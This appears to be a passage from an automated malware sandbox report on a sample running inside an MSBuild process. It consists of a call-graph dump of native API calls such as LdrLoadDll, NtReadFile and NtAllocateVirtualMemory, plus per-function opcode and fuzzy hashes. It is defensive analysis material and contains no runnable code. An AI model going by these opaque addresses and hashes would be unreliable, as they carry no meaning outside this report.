81635->81751 81636 414338 81754 41cf90 LdrLoadDll RtlFreeHeap 81636->81754 81638 414342 81755 41cf90 LdrLoadDll RtlFreeHeap 81638->81755 81640->81500 81642 415391 81641->81642 81643 414a40 8 API calls 81642->81643 81644 4153a7 81643->81644 81645 4153e2 81644->81645 81646 4153f5 81644->81646 81650 4153fa 81644->81650 81647 41bdc0 2 API calls 81645->81647 81648 41bdc0 2 API calls 81646->81648 81649 4153e7 81647->81649 81648->81650 81649->81503 81650->81503 81652 41ad74 81651->81652 81653 41ac20 LdrLoadDll 81651->81653 81756 41ac20 81652->81756 81653->81652 81656 41ac20 LdrLoadDll 81657 41ad86 81656->81657 81658 41ac20 LdrLoadDll 81657->81658 81659 41ad8f 81658->81659 81660 41ac20 LdrLoadDll 81659->81660 81661 41ad98 81660->81661 81662 41ac20 LdrLoadDll 81661->81662 81663 41ada1 81662->81663 81664 41ac20 LdrLoadDll 81663->81664 81665 41adad 81664->81665 81666 41ac20 LdrLoadDll 81665->81666 81667 41adb6 81666->81667 81668 41ac20 LdrLoadDll 81667->81668 81669 41adbf 81668->81669 81670 41ac20 LdrLoadDll 81669->81670 81671 41adc8 81670->81671 81672 41ac20 LdrLoadDll 81671->81672 81673 41add1 81672->81673 81674 41ac20 LdrLoadDll 81673->81674 81675 41adda 81674->81675 81676 41ac20 LdrLoadDll 81675->81676 81677 41ade6 81676->81677 81678 41ac20 LdrLoadDll 81677->81678 81679 41adef 81678->81679 81680 41ac20 LdrLoadDll 81679->81680 81681 41adf8 81680->81681 81682 41ac20 LdrLoadDll 81681->81682 81683 41ae01 81682->81683 81684 41ac20 LdrLoadDll 81683->81684 81685 41ae0a 81684->81685 81686 41ac20 LdrLoadDll 81685->81686 81687 41ae13 81686->81687 81688 41ac20 LdrLoadDll 81687->81688 81689 41ae1f 81688->81689 81690 41ac20 LdrLoadDll 81689->81690 81691 41ae28 81690->81691 81692 41ac20 LdrLoadDll 81691->81692 81693 41ae31 81692->81693 81694 41ac20 LdrLoadDll 81693->81694 81695 41ae3a 81694->81695 81696 41ac20 LdrLoadDll 81695->81696 81697 41ae43 81696->81697 81698 41ac20 LdrLoadDll 81697->81698 81699 41ae4c 81698->81699 81700 41ac20 LdrLoadDll 81699->81700 81701 41ae58 81700->81701 81702 41ac20 LdrLoadDll 81701->81702 81703 41ae61 81702->81703 81704 41ac20 LdrLoadDll 81703->81704 81705 41ae6a 81704->81705 81706 41ac20 LdrLoadDll 81705->81706 81707 41ae73 81706->81707 81708 41ac20 LdrLoadDll 81707->81708 81709 41ae7c 81708->81709 81710 41ac20 LdrLoadDll 81709->81710 81711 41ae85 81710->81711 81712 41ac20 LdrLoadDll 81711->81712 81713 41ae91 81712->81713 81714 41ac20 LdrLoadDll 81713->81714 81715 41ae9a 81714->81715 81716 41ac20 LdrLoadDll 81715->81716 81717 41aea3 81716->81717 81718 41ac20 LdrLoadDll 81717->81718 81719 41aeac 81718->81719 81720 41ac20 LdrLoadDll 81719->81720 81721 41aeb5 81720->81721 81722 41ac20 LdrLoadDll 81721->81722 81723 41aebe 81722->81723 81724 41ac20 LdrLoadDll 81723->81724 81725 41aeca 81724->81725 81726 41ac20 LdrLoadDll 81725->81726 81727 41aed3 81726->81727 81728 41ac20 LdrLoadDll 81727->81728 81729 41aedc 81728->81729 81729->81508 81731 419ecc 81730->81731 81732 41af50 LdrLoadDll 81730->81732 81762 13c2df0 LdrInitializeThunk 81731->81762 81732->81731 81733 419ee3 81733->81428 81735->81505 81737 41af50 LdrLoadDll 81736->81737 81738 41a54c NtAllocateVirtualMemory 81737->81738 81738->81608 81740 41cf40 81739->81740 81741 41cf46 81739->81741 81740->81613 81742 41bf90 2 API calls 81741->81742 81743 41cf6c 81742->81743 81743->81613 81745 41cfd0 81744->81745 81746 41bf90 2 API calls 81745->81746 81747 41d02d 81745->81747 81748 41d00a 81746->81748 81747->81621 81749 41bdc0 2 API calls 81748->81749 81749->81747 81750->81615 81751->81631 81752->81633 81753->81636 81754->81638 81755->81640 81757 41ac3b 81756->81757 81758 414e40 LdrLoadDll 81757->81758 81759 41ac5b 81758->81759 81760 414e40 LdrLoadDll 81759->81760 81761 41ad07 81759->81761 81760->81761 81761->81656 81762->81733 81764 13c2c1f LdrInitializeThunk 81763->81764 81765 13c2c11 81763->81765 81764->81514 81765->81514 81767 41af50 LdrLoadDll 81766->81767 81768 41a67c RtlFreeHeap 81767->81768 81768->81518 81770 407eb0 81769->81770 81771 407eab 81769->81771 81772 41bd40 2 API calls 81770->81772 81771->81436 81778 407ed5 81772->81778 81773 407f38 81773->81436 81774 419eb0 2 API calls 81774->81778 81775 407f3e 81777 407f64 81775->81777 81779 41a5b0 2 API calls 81775->81779 81777->81436 81778->81773 81778->81774 81778->81775 81780 41bd40 2 API calls 81778->81780 81785 41a5b0 81778->81785 81781 407f55 81779->81781 81780->81778 81781->81436 81783 40817e 81782->81783 81784 41a5b0 2 API calls 81782->81784 81783->81397 81784->81783 81786 41a5cc 81785->81786 81787 41af50 LdrLoadDll 81785->81787 81790 13c2c70 LdrInitializeThunk 81786->81790 81787->81786 81788 41a5e3 81788->81778 81790->81788 81792 41b5b3 81791->81792 81795 40ace0 81792->81795 81796 40ad04 81795->81796 81797 40ad40 LdrLoadDll 81796->81797 81798 409c4b 81796->81798 81797->81798 81798->81405 81801 40b053 81799->81801 81800 40b0d0 81800->81410 81801->81800 81814 419c80 LdrLoadDll 81801->81814 81804 41af50 LdrLoadDll 81803->81804 81805 40f1ab 81804->81805 81805->81413 81806 41a7c0 81805->81806 81807 41af50 LdrLoadDll 81806->81807 81808 41a7df LookupPrivilegeValueW 81807->81808 81808->81415 81810 41a26c 81809->81810 81811 41af50 LdrLoadDll 81809->81811 81815 13c2ea0 LdrInitializeThunk 81810->81815 81811->81810 81812 41a28b 81812->81416 81814->81800 81815->81812 81817 40b1e0 81816->81817 81818 40b030 LdrLoadDll 81817->81818 81819 40b1f4 81818->81819 81819->81351 81821 40ae41 81820->81821 81822 40ae3d 81820->81822 81823 40ae8c 81821->81823 81826 40ae5a 81821->81826 81822->81354 81867 419cc0 LdrLoadDll 81823->81867 81825 40ae9d 81825->81354 81866 419cc0 LdrLoadDll 81826->81866 81828 40ae7c 81828->81354 81830 40f490 3 API calls 81829->81830 81831 4143b6 81829->81831 81830->81831 81831->81356 81868 4087a0 81832->81868 81834 408a9d 81834->81358 81836 4087a0 20 API calls 81837 408a8a 81836->81837 81837->81834 81886 40f700 10 API calls 81837->81886 81840 41af50 LdrLoadDll 81839->81840 81841 41a50c 81840->81841 82008 13c2e80 LdrInitializeThunk 81841->82008 81842 40c312 81844 40f490 81842->81844 81845 40f4ad 81844->81845 82009 419fb0 81845->82009 81848 40f4f5 81848->81362 81849 41a000 2 API calls 81850 40f51e 81849->81850 81850->81362 81852 41af50 LdrLoadDll 81851->81852 81853 41a01c 81852->81853 82015 13c2d10 LdrInitializeThunk 81853->82015 81854 40c375 81854->81368 81854->81371 81857 41af50 LdrLoadDll 81856->81857 81858 41a06c 81857->81858 82016 13c2d30 LdrInitializeThunk 81858->82016 81859 40c449 81859->81379 81862 41af50 LdrLoadDll 81861->81862 81863 419e2c 81862->81863 82017 13c2fb0 LdrInitializeThunk 81863->82017 81864 40c49c 81864->81383 81866->81828 81867->81825 81869 407ea0 4 API calls 81868->81869 81884 4087ba 81868->81884 81869->81884 81870 408a49 81870->81834 81870->81836 81871 408a3f 81872 408160 2 API calls 81871->81872 81872->81870 81875 419ef0 2 API calls 81875->81884 81877 41a480 LdrLoadDll NtClose 81877->81884 81880 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81880->81884 81883 419e10 2 API calls 81883->81884 81884->81870 81884->81871 81884->81875 81884->81877 81884->81880 81884->81883 81887 419d00 81884->81887 81890 4085d0 81884->81890 81902 40f5e0 LdrLoadDll NtClose 81884->81902 81903 419d80 LdrLoadDll 81884->81903 81904 419db0 LdrLoadDll 81884->81904 81905 419e40 LdrLoadDll 81884->81905 81906 4083a0 81884->81906 81922 405f60 LdrLoadDll 81884->81922 81886->81834 81888 41af50 LdrLoadDll 81887->81888 81889 419d1c 81887->81889 81888->81889 81889->81884 81891 4085e6 81890->81891 81923 419870 81891->81923 81893 4085ff 81898 408771 81893->81898 81944 4081a0 81893->81944 81895 4086e5 81896 4083a0 11 API calls 81895->81896 81895->81898 81897 408713 81896->81897 81897->81898 81899 419ef0 2 API calls 81897->81899 81898->81884 81900 408748 81899->81900 81900->81898 81901 41a4f0 2 API calls 81900->81901 81901->81898 81902->81884 81903->81884 81904->81884 81905->81884 81907 4083c9 81906->81907 81987 408310 81907->81987 81910 41a4f0 2 API calls 81911 4083dc 81910->81911 81911->81910 81912 408467 81911->81912 81915 408462 81911->81915 81995 40f660 81911->81995 81912->81884 81913 41a480 2 API calls 81914 40849a 81913->81914 81914->81912 81916 419d00 LdrLoadDll 81914->81916 81915->81913 81917 4084ff 81916->81917 81917->81912 81999 419d40 81917->81999 81919 408563 81919->81912 81920 414a40 8 API calls 81919->81920 81921 4085b8 81920->81921 81921->81884 81922->81884 81924 41bf90 2 API calls 81923->81924 81925 419887 81924->81925 81951 409310 81925->81951 81927 4198a2 81928 4198e0 81927->81928 81929 4198c9 81927->81929 81932 41bd40 2 API calls 81928->81932 81930 41bdc0 2 API calls 81929->81930 81931 4198d6 81930->81931 81931->81893 81933 41991a 81932->81933 81934 41bd40 2 API calls 81933->81934 81935 419933 81934->81935 81941 419bd4 81935->81941 81957 41bd80 81935->81957 81938 419bc0 81939 41bdc0 2 API calls 81938->81939 81940 419bca 81939->81940 81940->81893 81942 41bdc0 2 API calls 81941->81942 81943 419c29 81942->81943 81943->81893 81945 40829f 81944->81945 81946 4081b5 81944->81946 81945->81895 81946->81945 81947 414a40 8 API calls 81946->81947 81948 408222 81947->81948 81949 41bdc0 2 API calls 81948->81949 81950 408249 81948->81950 81949->81950 81950->81895 81952 409335 81951->81952 81953 40ace0 LdrLoadDll 81952->81953 81954 409368 81953->81954 81956 40938d 81954->81956 81960 40cf10 81954->81960 81956->81927 81981 41a570 81957->81981 81961 40cf3c 81960->81961 81962 41a1d0 LdrLoadDll 81961->81962 81963 40cf55 81962->81963 81964 40cf5c 81963->81964 81971 41a210 81963->81971 81964->81956 81966 40cf7f 81966->81964 81978 41a800 LdrLoadDll 81966->81978 81968 40cf97 81969 41a480 2 API calls 81968->81969 81970 40cfba 81969->81970 81970->81956 81972 41a22c 81971->81972 81973 41af50 LdrLoadDll 81971->81973 81979 13c2ca0 LdrInitializeThunk 81972->81979 81973->81972 81974 41a247 81974->81966 81980 13c2ea0 LdrInitializeThunk 81974->81980 81975 41a28b 81975->81966 81978->81968 81979->81974 81980->81975 81982 41af50 LdrLoadDll 81981->81982 81983 41a58c 81982->81983 81986 13c2f90 LdrInitializeThunk 81983->81986 81984 419bb9 81984->81938 81984->81941 81986->81984 81988 408328 81987->81988 81989 40ace0 LdrLoadDll 81988->81989 81990 408343 81989->81990 81991 414e40 LdrLoadDll 81990->81991 81992 408353 81991->81992 81993 40835c PostThreadMessageW 81992->81993 81994 408370 81992->81994 81993->81994 81994->81911 81996 40f673 81995->81996 82002 419e80 81996->82002 82000 41af50 LdrLoadDll 81999->82000 82001 419d5c 82000->82001 82001->81919 82003 41af50 LdrLoadDll 82002->82003 82004 419e9c 82003->82004 82007 13c2dd0 LdrInitializeThunk 82004->82007 82005 40f69e 82005->81911 82007->82005 82008->81842 82010 419fcc 82009->82010 82011 41af50 LdrLoadDll 82009->82011 82014 13c2f30 LdrInitializeThunk 82010->82014 82011->82010 82012 40f4ee 82012->81848 82012->81849 82014->82012 82015->81854 82016->81859 82017->81864 82021 13c2ad0 LdrInitializeThunk

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 41a400-41a449 call 41af50 NtReadFile
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                  • String ID: !JA$bMA$bMA
                                                                                                                                                                                                                                                                  • API String ID: 2738559852-4222312340
                                                                                                                                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                                                                  • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 231 40ace0-40ad09 call 41cc50 234 40ad0b-40ad0e 231->234 235 40ad0f-40ad1d call 41d070 231->235 238 40ad2d-40ad3e call 41b490 235->238 239 40ad1f-40ad2a call 41d2f0 235->239 245 40ad40-40ad54 LdrLoadDll 238->245 246 40ad57-40ad5a 238->246 239->238 245->246
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                  • Opcode ID: c7739da805cbb3b2d9e9c53a0cd9873e2ca33319032631d49d16e6f9fd887cd1
                                                                                                                                                                                                                                                                  • Instruction ID: ed2a01354a4d3ac1085a6549a7ff89878a805c02732dc59c20595c8cd57bf7d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7739da805cbb3b2d9e9c53a0cd9873e2ca33319032631d49d16e6f9fd887cd1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE015EB5E0020DABDF10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 247 41a350-41a3a1 call 41af50 NtCreateFile
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                                                                  • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 266 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                                                  • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 278 41a480-41a496 279 41a49c-41a4a9 NtClose 278->279 280 41a497 call 41af50 278->280 280->279
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                                                  • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A47A Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                  • Opcode ID: 37c9eb19888221eeeebb5066e488b31707536bdb8b7456fedd117f1555cb631d
                                                                                                                                                                                                                                                                  • Instruction ID: 628c4e7ddbfb0b3d66e10decf9445342cec58b9a09aff907df14d55aee4f12ae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37c9eb19888221eeeebb5066e488b31707536bdb8b7456fedd117f1555cb631d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55D02BAD40D2C04FCB11EFB4A4D10D67F40DD5122871909CEE8AC0B303C228D6159391
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: bfe9c1b90711cd8418e57cfef556ca518afebbc761cf3ab22c4f80d3a03c9895
                                                                                                                                                                                                                                                                  • Instruction ID: 5382c45e4738f2f1525df3e0906e64fd44ca76a1a25d517cf73ce924b8557613
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe9c1b90711cd8418e57cfef556ca518afebbc761cf3ab22c4f80d3a03c9895
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9890026A202410039105715C5414616401A97E0205B55C061F1014590DC52599956226
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 99e0f32a04bb4d2809ff309e4ea91a3d2930142ec88b7821615321f2b06442bf
                                                                                                                                                                                                                                                                  • Instruction ID: 2f730b9bc3f1cb5f514ec00b1dcde4da96d7baf9d27ac3d8091e653aa32cca87
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99e0f32a04bb4d2809ff309e4ea91a3d2930142ec88b7821615321f2b06442bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4490023A20141802E180715C540464A001597D1305F95C055F0025654DCA159B5D77A2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: dbf766ae5020bb0a40eb24c2887a7916ab5b514365e2ab45974c38103015a8ae
                                                                                                                                                                                                                                                                  • Instruction ID: fa1fa0df261a42bcf6a9866b683544295fe9e9fa5a361bdb8848cf7ef6c91ac3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbf766ae5020bb0a40eb24c2887a7916ab5b514365e2ab45974c38103015a8ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2690043F311410035105F55C17045070057D7D5355355C071F1015550CD731DD755333
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: d3dcbd36038ee6dbc82ea08a107857a439ff64025ac3fb35506b0923fcca3ab0
                                                                                                                                                                                                                                                                  • Instruction ID: d51a311b4f04e3f8f6662614cf4a7b78e97b2f2255e63da032fcee275c2e678a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3dcbd36038ee6dbc82ea08a107857a439ff64025ac3fb35506b0923fcca3ab0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B90022A30141003E140715C64186064015E7E1305F55D051F0414554CD915995A5323
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
